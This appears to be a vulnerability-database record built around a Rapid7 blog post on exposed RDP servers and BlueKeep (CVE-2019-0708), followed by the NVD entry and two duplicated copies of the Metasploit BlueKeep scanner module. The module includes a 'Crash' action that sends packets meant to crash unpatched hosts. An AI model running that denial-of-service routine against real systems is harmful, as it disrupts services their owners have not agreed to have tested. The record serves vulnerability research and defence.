{"id": "RAPID7BLOG:7549D87CE6E6AE596B8031184231ECD1", "type": "rapid7blog", "bulletinFamily": "info", "title": "NICER Protocol Deep Dive: Internet Exposure of Remote Desktop (RDP)", "description": "\n\nWelcome to the NICER Protocol Deep Dive blog series! When we started researching what all was out on the internet way back in January, we had no idea we'd end up with a hefty, 137-page tome of a research report. The sheer length of such a thing might put off folks who might otherwise learn a thing or two about the nature of internet exposure, so we figured, why not break up all the protocol studies into their own reports?\n\nSo, here we are! What follows is taken directly from our National / Industry / Cloud Exposure Report (NICER), so if you don't want to wait around for the next installment, you can cheat and read ahead!\n\n#### [Research] Read the full NICER report today\n\n[Get Started](<https://www.rapid7.com/info/nicer-2020/>)\n\n \n\n\n## Remote Desktop \u2014 RDP (3389)\n\n_It's like VNC, but more Microsofty._\n\n### TLDR\n\n**WHAT IT IS: **A proprietary protocol developed by Microsoft for making graphical user interface (GUI) connections from one system to another. The default port is TCP/3389, but it can be hosted on any open port.\n\n**HOW MANY: **3,979,356 discovered nodes. 44,540 (1.1%) have Recog operating system fingerprints. 3,974,474 (99.8%) have Recog fingerprints for security scheme\n\n**VULNERABILITIES: **Numerous remote code execution issues including [CVE-2019-0708 (BlueKeep)](<https://attackerkb.com/topics/huQasjoVMS/windows-remote-desktop-rdp-use-after-free-vulnerablility-bluekeep>) disclosed by Microsoft in the spring of 2019.\n\n**ADVICE:** Place RDP behind a VPN connection if it needs to be \u201calways on.\u201d If RDP can be made intermittently available, ensure all nodes exposing RDP are fully patched, hardened to recommended specifications, and utilize multi-factor authentication.\n\n**ALTERNATIVES:** This is Microsoft\u2019s recommended solution for remotely accessing remote systems. It does what it says on the tin pretty well, so there are no real alternatives. If you need this type of access, follow the guidance in the Advice section.\n\n**GETTING: **Slightly better! We saw almost 5% fewer RDP than we measured in 2019.\n\n### Discovery details\n\n[Project Sonar](<https://www.rapid7.com/research/project-sonar/>) found just under 4 million active RDP nodes, with over a quarter of them in China-homed networks.\n\n\n\nUnsurprisingly, we also find about a quarter of RDP nodes within our in-scope cloud provider networks\u2014after all, one does need to connect to these remote systems to use them\u2014though we would have expected Microsoft Azure to take the top spot (given, y\u2019know, \u201cWindows\u201d). So, imagine our surprise when we found Azure-hosted RDP came in third. It's a strong third place, though, behind the twin cloud giants Amazon and Alibaba.\n\nRDP is everywhere, with a total population an order of magnitude more than VNC (about 4 million and change versus less than 400,000 for VNC). Apart from the aforementioned \u201ccloud\u201d use case, small businesses use it off of business-class ISP connections; enterprises use it for remote access and administration; retail operations often have RDP enabled on point-of-sale systems for routine management; and, home users, too, find it easy enough to use to take the time to poke holes in their firewalls to enable remote access to home PCs. This ubiquity, along with pervasive misconfigurations and vulnerabilities, make it an ideal target for attackers, which we\u2019ll cover in the next section.\n\nThere are [many ways](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/5073f4ed-1e93-45e1-b039-6e30c385867c>) to configure RDP sessions, and Project Sonar is able to identify three states: \u201cstandard\u201d or \u201clegacy,\u201d \u201cnetwork level authentication\u201d (NLA), and transport layer security (TLS). \u201cStandard\u201d is a train wreck waiting to happen, and both NLA and TLS do a fairly good job securing your sessions (provided you\u2019re patching regularly and using safe configurations with multi-factor authentication). And, from the looks of it, most residential and business-class users seem to have received that memo given the high percentage of nodes in the top 10 countries and the fact that clouds are using more secure connection options:\n\n\n\nHowever, all clouds are not created nearly as equal, with Oracle cloud users limping in dead last (again, by percent of nodes in that cloud) when it comes to use of safer security modes. This is likely due to the default settings when enabling RDP.\n\n### Attacker\u2019s view\n\nThis is one protocol we do have robust honeypot coverage for, and we\u2019ll focus on two areas: RDP session establishment and attempts to exploit RDP via BlueKeep.\n\nDespite predictions for cyber-doom and gloom, BlueKeep\u2014the unauthenticated remote code execution flaw in RDP, disclosed by Microsoft in the spring of 2019\u2014pretty much faded into the background, possibly due to folks actually patching and switching to NLA security (as we see in the country and cloud top views and in the fact that 92% of surveyed RDP nodes were using NLA). We posit that the early, and consistent, measured warnings at all levels helped keep BlueKeep from being the nightmare it could have been.\n\nThat does not mean there is no evidence of BlueKeep activity; however, we tend to see orders of magnitude more credential stuffing attempts than we do use of BlueKeep:\n\n\n\nThere are four takeaways from the above figure:\n\n 1. The BlueKeep volume is super low.\n 2. The number of unique source hosts with malicious intent is low.\n 3. RDP activity is a constant.\n 4. Attackers thought they might get lucky right around the time the U.S. entered lockdown because of the 2020 pandemic.\n\nBetween Jan. 1, 2020, and April 30, 2020, Heisenberg caught just over 8,500 distinct source IP addresses trying to use either BlueKeep-based exploits or perform credential stuffing against our honeypot network. Eleven percent (11%) of these unique IPv4 addresses originate from DigitalOcean, but 16% of all malicious RDP traffic comes from Hostkey, a hosting provider in the Netherlands. While those two network sources do stand out, 1,310 distinct autonomous systems (ASes) are hosting sources with malicious intent, so there are plenty of places to wag one\u2019s chastisement finger at.\n\n### Our advice\n\n**IT and IT security teams **should strongly consider putting RDP behind a VPN if they are heck-bent on using RDP for GUI remote access. If you need to place RDP directly on the internet, consider doing so on an as-needed basis and ensuring all systems with RDP exposed are patched and have RDP configured as strongly as possible, backed by multi-factor authentication.\n\n**Cloud providers** should have amazingly secure defaults and regularly warn users if they deploy RDP with weaker settings. Giving users the ability to easily enable RDP for only a certain period of time would go a long way toward helping thwart credential stuffing attacks. To help make the internet a bit safer, providers should also monitor for malicious traffic and work with regional CERTs to shut down malicious nodes as soon as possible.\n\n**Government cybersecurity agencies **should continue to educate their constituents on the dangers of RDP and how to ensure safe use of RDP. Given that there are fairly well-known sources with evil intent, centers should work with regional CERTs and hosting/cloud providers and ISPs to make it easier to stop bad traffic before it compromises remote hosts.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "published": "2020-10-23T17:26:31", "modified": "2020-10-23T17:26:31", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://blog.rapid7.com/2020/10/23/nicer-protocol-deep-dive-internet-exposure-of-remote-desktop-rdp/", "reporter": "Tod Beardsley", "references": [], "cvelist": ["CVE-2019-0708"], "lastseen": "2020-10-23T18:41:37", "viewCount": 71, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-0708"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/RDP/CVE_2019_0708_BLUEKEEP/", "MSF:AUXILIARY/SCANNER/RDP/CVE_2019_0708_BLUEKEEP", "MSF:EXPLOIT/WINDOWS/RDP/CVE_2019_0708_BLUEKEEP_RCE", "MSF:EXPLOIT/WINDOWS/RDP/CVE_2019_0708_BLUEKEEP_RCE/"]}, {"type": "msrc", "idList": ["MSRC:6A6ED6A5B652378DCBA3113B064E973B"]}, {"type": "f5", "idList": ["F5:K25238311"]}, {"type": "symantec", "idList": ["SMNTC-108273"]}, {"type": "kitploit", "idList": ["KITPLOIT:727243444931520192", "KITPLOIT:3397940664053959113", "KITPLOIT:43221571859278589", "KITPLOIT:1986765330027575502", "KITPLOIT:998955151150716619", "KITPLOIT:3359946123198241398", "KITPLOIT:3245813529202482542", "KITPLOIT:4482238198881011483", "KITPLOIT:5896951739767119270", "KITPLOIT:1225614657733366094"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994162", "MYHACK58:62201994388", "MYHACK58:62201994234", "MYHACK58:62201994152", "MYHACK58:62201994154", "MYHACK58:62201995234", "MYHACK58:62201994259", "MYHACK58:62201995881", "MYHACK58:62201994153"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310108611", "OPENVAS:1361412562310814894", "OPENVAS:1361412562310108794"]}, {"type": "threatpost", "idList": ["THREATPOST:472451689B2FA39FCB837D08B514FF91", "THREATPOST:0D8008A1EF72C3A6059283D0D896B819", "THREATPOST:4F23E34A058045723339C103BC41A3D1", "THREATPOST:902F021868A194A6F02A30F8709AA730", "THREATPOST:BDEA819E4532E0D1FA016778F659F7E8", "THREATPOST:78996437466E037C7F29EFB1FFBBAB42"]}, {"type": "talosblog", "idList": ["TALOSBLOG:4C073D825207102B86D0C8999A5A28CC", "TALOSBLOG:DC2E9A485DD55B49C0CC8932C0026F33", "TALOSBLOG:6631705A9B0F56348E3E1A97469105A1", "TALOSBLOG:56EE545CE9B30B21AC2FD24C6DBB5181", "TALOSBLOG:30A0CC27D6C35FC08DF198CA0AA9C626", "TALOSBLOG:62182E90D88C9282869F40D834CA56BA", "TALOSBLOG:D44D4A467C76DBF910B545640D073425", "TALOSBLOG:2FC8F90E015AB54A7397D49B24BE5B5E", "TALOSBLOG:C6C252288047D319ADE770A26A8DA196", "TALOSBLOG:97F975C073505AE88655FF1C539740A6"]}, {"type": "thn", "idList": ["THN:3D0ED27488E8AFC91D99882663F7E35A", "THN:1BA2E3EE721856ECEE43B825656909B0", "THN:39C614DBFC7ED1BBBEAAD9DC8C04C7CD"]}, {"type": "zdt", "idList": ["1337DAY-ID-32978", "1337DAY-ID-33565"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20190529-01-WINDOWS"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:C90C58C22E53621B5A2A2AAEBCDF2EBC"]}, {"type": "mssecure", "idList": ["MSSECURE:B42B640CBAB51E35DC07B81926B5F910", "MSSECURE:E0AA6CC56D602890BBD5AF46A036FE67", "MSSECURE:9A5D03B503C4E238EEFD4BF9E93C78A9"]}, {"type": "canvas", "idList": ["BLUEKEEP"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154579", "PACKETSTORM:153627"]}, {"type": "cisa", "idList": ["CISA:81A1472B76D72ABF1AA69524AFD40F34"]}, {"type": "nessus", "idList": ["SMB_NT_MS19_MAY_XP_2003.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:47120", "EDB-ID:47683", "EDB-ID:46946"]}, {"type": "ics", "idList": ["ICSMA-20-049-01"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:563DC556FF331059CAC2F71B19B341B5", "QUALYSBLOG:AE1D32AF43539C7362B2E060204A5413", "QUALYSBLOG:400D28FE44174674BB4561AA9416F532"]}], "modified": "2020-10-23T18:41:37", "rev": 2}, "score": {"value": 5.1, "vector": "NONE", "modified": "2020-10-23T18:41:37", "rev": 2}, "vulnersScore": 5.1}}

{"cve": [{"lastseen": "2020-10-03T13:38:36", "description": "A remote code execution vulnerability exists in Remote Desktop Services formerly known as Terminal Services when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests, aka 'Remote Desktop Services Remote Code Execution Vulnerability'.", "edition": 10, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-05-16T19:29:00", "title": "CVE-2019-0708", "type": "cve", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0708"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/o:microsoft:windows_vista:-", "cpe:/o:microsoft:windows_server_2003:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_xp:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2003:r2", "cpe:/o:microsoft:windows_7:-"], "id": "CVE-2019-0708", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-0708", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2003:-:sp2:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_xp:-:sp3:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_server_2003:r2:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_xp:-:sp2:*:*:professional:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2003:-:sp2:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*"]}], "metasploit": [{"lastseen": "2020-11-15T19:49:35", "description": "This module checks a range of hosts for the CVE-2019-0708 vulnerability by binding the MS_T120 channel outside of its normal slot and sending non-DoS packets which respond differently on patched and vulnerable hosts. It can optionally trigger the DoS vulnerability.\n", "published": "2019-06-03T14:38:12", "type": "metasploit", "title": "CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-0708"], "modified": "2020-06-22T11:48:39", "id": "MSF:AUXILIARY/SCANNER/RDP/CVE_2019_0708_BLUEKEEP/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::RDP\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check',\n 'Description' => %q{\n This module checks a range of hosts for the CVE-2019-0708 vulnerability\n by binding the MS_T120 channel outside of its normal slot and sending\n non-DoS packets which respond differently on patched and vulnerable hosts.\n It can optionally trigger the DoS vulnerability.\n },\n 'Author' =>\n [\n 'National Cyber Security Centre', # Discovery\n 'JaGoTu', # Module\n 'zerosum0x0', # Module\n 'Tom Sellers' # TLS support, packet documenentation, DoS implementation\n ],\n 'References' =>\n [\n [ 'CVE', '2019-0708' ],\n [ 'URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708' ],\n [ 'URL', 'https://zerosum0x0.blogspot.com/2019/05/avoiding-dos-how-bluekeep-scanners-work.html' ]\n ],\n 'DisclosureDate' => '2019-05-14',\n 'License' => MSF_LICENSE,\n 'Actions' => [\n ['Scan', 'Description' => 'Scan for exploitable targets'],\n ['Crash', 'Description' => 'Trigger denial of service vulnerability'],\n ],\n 'DefaultAction' => 'Scan',\n 'Notes' =>\n {\n 'Stability' => [ CRASH_SAFE ],\n 'AKA' => ['BlueKeep']\n }\n )\n )\n end\n\n def report_goods\n report_vuln(\n host: rhost,\n port: rport,\n proto: 'tcp',\n name: name,\n info: 'Behavior indicates a missing Microsoft Windows RDP patch for CVE-2019-0708',\n refs: references\n )\n end\n\n def run_host(ip)\n # Allow the run command to call the check command\n\n status = check_host(ip)\n if status == Exploit::CheckCode::Vulnerable\n print_good(status[1].to_s)\n elsif status == Exploit::CheckCode::Safe\n vprint_error(status[1].to_s)\n else\n vprint_status(status[1].to_s)\n end\n\n status\n end\n\n def rdp_reachable\n rdp_connect\n rdp_disconnect\n return true\n rescue Rex::ConnectionRefused\n return false\n rescue Rex::ConnectionTimeout\n return false\n end\n\n def check_host(_ip)\n # The check command will call this method instead of run_host\n status = Exploit::CheckCode::Unknown\n\n begin\n begin\n rdp_connect\n rescue ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError\n return Exploit::CheckCode::Safe('The target service is not running or refused our connection.')\n end\n\n status = check_rdp_vuln\n rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError, ::TypeError => e\n bt = e.backtrace.join(\"\\n\")\n vprint_error(\"Unexpected error: #{e.message}\")\n vprint_line(bt)\n elog(e)\n rescue RdpCommunicationError\n vprint_error('Error communicating RDP protocol.')\n status = Exploit::CheckCode::Unknown\n rescue Errno::ECONNRESET\n vprint_error('Connection reset')\n rescue StandardError => e\n bt = e.backtrace.join(\"\\n\")\n vprint_error(\"Unexpected error: #{e.message}\")\n vprint_line(bt)\n elog(e)\n ensure\n rdp_disconnect\n end\n\n status\n end\n\n def check_for_patch\n begin\n 6.times do\n _res = rdp_recv\n end\n rescue RdpCommunicationError\n # we don't care\n end\n\n # The loop below sends Virtual Channel PDUs (2.2.6.1) that vary in length\n # The arch governs which of the packets triggers the desired response\n # which is an MCS Disconnect Provider Ultimatum or a timeout.\n\n # Disconnect Provider message of a valid size for each platform\n # has proven to be safe to send as part of the vulnerability check.\n x86_string = '00000000020000000000000000000000'\n x64_string = '0000000000000000020000000000000000000000000000000000000000000000'\n\n if action.name == 'Crash'\n vprint_status('Sending denial of service payloads')\n # Length and chars are arbitrary but total length needs to be longer than\n # 16 for x86 and 32 for x64. Making the payload too long seems to cause\n # the DoS to fail. Note that sometimes the DoS seems to fail. Increasing\n # the payload size and sending more of them doesn't seem to improve the\n # reliability. It *seems* to happen more often on x64, I haven't seen it\n # fail against x86. Repeated attempts will generally trigger the DoS.\n x86_string += 'FF' * 1\n x64_string += 'FF' * 2\n else\n vprint_status('Sending patch check payloads')\n end\n\n chan_flags = RDPConstants::CHAN_FLAG_FIRST | RDPConstants::CHAN_FLAG_LAST\n channel_id = [1005].pack('S>')\n x86_packet = rdp_build_pkt(build_virtual_channel_pdu(chan_flags, [x86_string].pack('H*')), channel_id)\n\n x64_packet = rdp_build_pkt(build_virtual_channel_pdu(chan_flags, [x64_string].pack('H*')), channel_id)\n\n 6.times do\n rdp_send(x86_packet)\n rdp_send(x64_packet)\n\n # A single pass should be sufficient to cause DoS\n if action.name == 'Crash'\n sleep(1)\n rdp_disconnect\n\n sleep(5)\n if rdp_reachable\n print_error(\"Target doesn't appear to have been crashed. Consider retrying.\")\n return Exploit::CheckCode::Unknown\n else\n print_good('Target service appears to have been successfully crashed.')\n return Exploit::CheckCode::Vulnerable('The target appears to have been crashed by disconnecting from an incorrectly-bound MS_T120 channel.')\n end\n end\n\n # Quick check for the Ultimatum PDU\n begin\n res = rdp_recv(-1, 1)\n rescue EOFError\n # we don't care\n end\n return Exploit::CheckCode::Vulnerable('The target attempted cleanup of the incorrectly-bound MS_T120 channel.') if res&.include?(['0300000902f0802180'].pack('H*'))\n\n # Slow check for Ultimatum PDU. If it doesn't respond in a timely\n # manner then the host is likely patched.\n begin\n 4.times do\n res = rdp_recv\n # 0x2180 = MCS Disconnect Provider Ultimatum PDU - 2.2.2.3\n if res.include?(['0300000902f0802180'].pack('H*'))\n return Exploit::CheckCode::Vulnerable('The target attempted cleanup of the incorrectly-bound MS_T120 channel.')\n end\n end\n rescue RdpCommunicationError\n # we don't care\n end\n end\n\n Exploit::CheckCode::Safe\n end\n\n def check_rdp_vuln\n # check if rdp is open\n is_rdp, version_info = rdp_fingerprint\n unless is_rdp\n vprint_error('Could not connect to RDP service.')\n return Exploit::CheckCode::Unknown\n end\n rdp_disconnect\n rdp_connect\n is_rdp, server_selected_proto = rdp_check_protocol\n\n requires_nla = [RDPConstants::PROTOCOL_HYBRID, RDPConstants::PROTOCOL_HYBRID_EX].include? server_selected_proto\n product_version = (version_info && version_info[:product_version]) ? version_info[:product_version] : 'N/A'\n info = \"Detected RDP on #{peer} (Windows version: #{product_version})\"\n\n service_info = \"Requires NLA: #{(!version_info[:product_version].nil? && requires_nla) ? 'Yes' : 'No'}\"\n info << \" (#{service_info})\"\n\n vprint_status(info)\n\n if requires_nla\n vprint_status('Server requires NLA (CredSSP) security which mitigates this vulnerability.')\n return Exploit::CheckCode::Safe\n end\n\n chans = [\n ['cliprdr', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ['MS_T120', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_COMPRESS_RDP],\n ['rdpsnd', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],\n ['snddbg', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],\n ['rdpdr', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_COMPRESS_RDP],\n ]\n\n success = rdp_negotiate_security(chans, server_selected_proto)\n return Exploit::CheckCode::Unknown unless success\n\n rdp_establish_session\n\n result = check_for_patch\n\n if result == Exploit::CheckCode::Vulnerable\n report_goods\n end\n\n # Can't determine, but at least we know the service is running\n result\n end\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb"}, {"lastseen": "2020-10-13T17:08:23", "description": "This module checks a range of hosts for the CVE-2019-0708 vulnerability by binding the MS_T120 channel outside of its normal slot and sending non-DoS packets which respond differently on patched and vulnerable hosts. It can optionally trigger the DoS vulnerability.\n", "published": "2019-06-03T14:38:12", "type": "metasploit", "title": "CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-0708"], "modified": "2020-06-22T11:48:39", "id": "MSF:AUXILIARY/SCANNER/RDP/CVE_2019_0708_BLUEKEEP", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::RDP\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE Check',\n 'Description' => %q{\n This module checks a range of hosts for the CVE-2019-0708 vulnerability\n by binding the MS_T120 channel outside of its normal slot and sending\n non-DoS packets which respond differently on patched and vulnerable hosts.\n It can optionally trigger the DoS vulnerability.\n },\n 'Author' =>\n [\n 'National Cyber Security Centre', # Discovery\n 'JaGoTu', # Module\n 'zerosum0x0', # Module\n 'Tom Sellers' # TLS support, packet documenentation, DoS implementation\n ],\n 'References' =>\n [\n [ 'CVE', '2019-0708' ],\n [ 'URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708' ],\n [ 'URL', 'https://zerosum0x0.blogspot.com/2019/05/avoiding-dos-how-bluekeep-scanners-work.html' ]\n ],\n 'DisclosureDate' => '2019-05-14',\n 'License' => MSF_LICENSE,\n 'Actions' => [\n ['Scan', 'Description' => 'Scan for exploitable targets'],\n ['Crash', 'Description' => 'Trigger denial of service vulnerability'],\n ],\n 'DefaultAction' => 'Scan',\n 'Notes' =>\n {\n 'Stability' => [ CRASH_SAFE ],\n 'AKA' => ['BlueKeep']\n }\n )\n )\n end\n\n def report_goods\n report_vuln(\n host: rhost,\n port: rport,\n proto: 'tcp',\n name: name,\n info: 'Behavior indicates a missing Microsoft Windows RDP patch for CVE-2019-0708',\n refs: references\n )\n end\n\n def run_host(ip)\n # Allow the run command to call the check command\n\n status = check_host(ip)\n if status == Exploit::CheckCode::Vulnerable\n print_good(status[1].to_s)\n elsif status == Exploit::CheckCode::Safe\n vprint_error(status[1].to_s)\n else\n vprint_status(status[1].to_s)\n end\n\n status\n end\n\n def rdp_reachable\n rdp_connect\n rdp_disconnect\n return true\n rescue Rex::ConnectionRefused\n return false\n rescue Rex::ConnectionTimeout\n return false\n end\n\n def check_host(_ip)\n # The check command will call this method instead of run_host\n status = Exploit::CheckCode::Unknown\n\n begin\n begin\n rdp_connect\n rescue ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError\n return Exploit::CheckCode::Safe('The target service is not running or refused our connection.')\n end\n\n status = check_rdp_vuln\n rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError, ::TypeError => e\n bt = e.backtrace.join(\"\\n\")\n vprint_error(\"Unexpected error: #{e.message}\")\n vprint_line(bt)\n elog(e)\n rescue RdpCommunicationError\n vprint_error('Error communicating RDP protocol.')\n status = Exploit::CheckCode::Unknown\n rescue Errno::ECONNRESET\n vprint_error('Connection reset')\n rescue StandardError => e\n bt = e.backtrace.join(\"\\n\")\n vprint_error(\"Unexpected error: #{e.message}\")\n vprint_line(bt)\n elog(e)\n ensure\n rdp_disconnect\n end\n\n status\n end\n\n def check_for_patch\n begin\n 6.times do\n _res = rdp_recv\n end\n rescue RdpCommunicationError\n # we don't care\n end\n\n # The loop below sends Virtual Channel PDUs (2.2.6.1) that vary in length\n # The arch governs which of the packets triggers the desired response\n # which is an MCS Disconnect Provider Ultimatum or a timeout.\n\n # Disconnect Provider message of a valid size for each platform\n # has proven to be safe to send as part of the vulnerability check.\n x86_string = '00000000020000000000000000000000'\n x64_string = '0000000000000000020000000000000000000000000000000000000000000000'\n\n if action.name == 'Crash'\n vprint_status('Sending denial of service payloads')\n # Length and chars are arbitrary but total length needs to be longer than\n # 16 for x86 and 32 for x64. Making the payload too long seems to cause\n # the DoS to fail. Note that sometimes the DoS seems to fail. Increasing\n # the payload size and sending more of them doesn't seem to improve the\n # reliability. It *seems* to happen more often on x64, I haven't seen it\n # fail against x86. Repeated attempts will generally trigger the DoS.\n x86_string += 'FF' * 1\n x64_string += 'FF' * 2\n else\n vprint_status('Sending patch check payloads')\n end\n\n chan_flags = RDPConstants::CHAN_FLAG_FIRST | RDPConstants::CHAN_FLAG_LAST\n channel_id = [1005].pack('S>')\n x86_packet = rdp_build_pkt(build_virtual_channel_pdu(chan_flags, [x86_string].pack('H*')), channel_id)\n\n x64_packet = rdp_build_pkt(build_virtual_channel_pdu(chan_flags, [x64_string].pack('H*')), channel_id)\n\n 6.times do\n rdp_send(x86_packet)\n rdp_send(x64_packet)\n\n # A single pass should be sufficient to cause DoS\n if action.name == 'Crash'\n sleep(1)\n rdp_disconnect\n\n sleep(5)\n if rdp_reachable\n print_error(\"Target doesn't appear to have been crashed. Consider retrying.\")\n return Exploit::CheckCode::Unknown\n else\n print_good('Target service appears to have been successfully crashed.')\n return Exploit::CheckCode::Vulnerable('The target appears to have been crashed by disconnecting from an incorrectly-bound MS_T120 channel.')\n end\n end\n\n # Quick check for the Ultimatum PDU\n begin\n res = rdp_recv(-1, 1)\n rescue EOFError\n # we don't care\n end\n return Exploit::CheckCode::Vulnerable('The target attempted cleanup of the incorrectly-bound MS_T120 channel.') if res&.include?(['0300000902f0802180'].pack('H*'))\n\n # Slow check for Ultimatum PDU. If it doesn't respond in a timely\n # manner then the host is likely patched.\n begin\n 4.times do\n res = rdp_recv\n # 0x2180 = MCS Disconnect Provider Ultimatum PDU - 2.2.2.3\n if res.include?(['0300000902f0802180'].pack('H*'))\n return Exploit::CheckCode::Vulnerable('The target attempted cleanup of the incorrectly-bound MS_T120 channel.')\n end\n end\n rescue RdpCommunicationError\n # we don't care\n end\n end\n\n Exploit::CheckCode::Safe\n end\n\n def check_rdp_vuln\n # check if rdp is open\n is_rdp, version_info = rdp_fingerprint\n unless is_rdp\n vprint_error('Could not connect to RDP service.')\n return Exploit::CheckCode::Unknown\n end\n rdp_disconnect\n rdp_connect\n is_rdp, server_selected_proto = rdp_check_protocol\n\n requires_nla = [RDPConstants::PROTOCOL_HYBRID, RDPConstants::PROTOCOL_HYBRID_EX].include? server_selected_proto\n product_version = (version_info && version_info[:product_version]) ? version_info[:product_version] : 'N/A'\n info = \"Detected RDP on #{peer} (Windows version: #{product_version})\"\n\n service_info = \"Requires NLA: #{(!version_info[:product_version].nil? && requires_nla) ? 'Yes' : 'No'}\"\n info << \" (#{service_info})\"\n\n vprint_status(info)\n\n if requires_nla\n vprint_status('Server requires NLA (CredSSP) security which mitigates this vulnerability.')\n return Exploit::CheckCode::Safe\n end\n\n chans = [\n ['cliprdr', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP | RDPConstants::CHAN_COMPRESS_RDP | RDPConstants::CHAN_SHOW_PROTOCOL],\n ['MS_T120', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_COMPRESS_RDP],\n ['rdpsnd', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],\n ['snddbg', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP],\n ['rdpdr', RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_COMPRESS_RDP],\n ]\n\n success = rdp_negotiate_security(chans, server_selected_proto)\n return Exploit::CheckCode::Unknown unless success\n\n rdp_establish_session\n\n result = check_for_patch\n\n if result == Exploit::CheckCode::Vulnerable\n report_goods\n end\n\n # Can't determine, but at least we know the service is running\n result\n end\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": 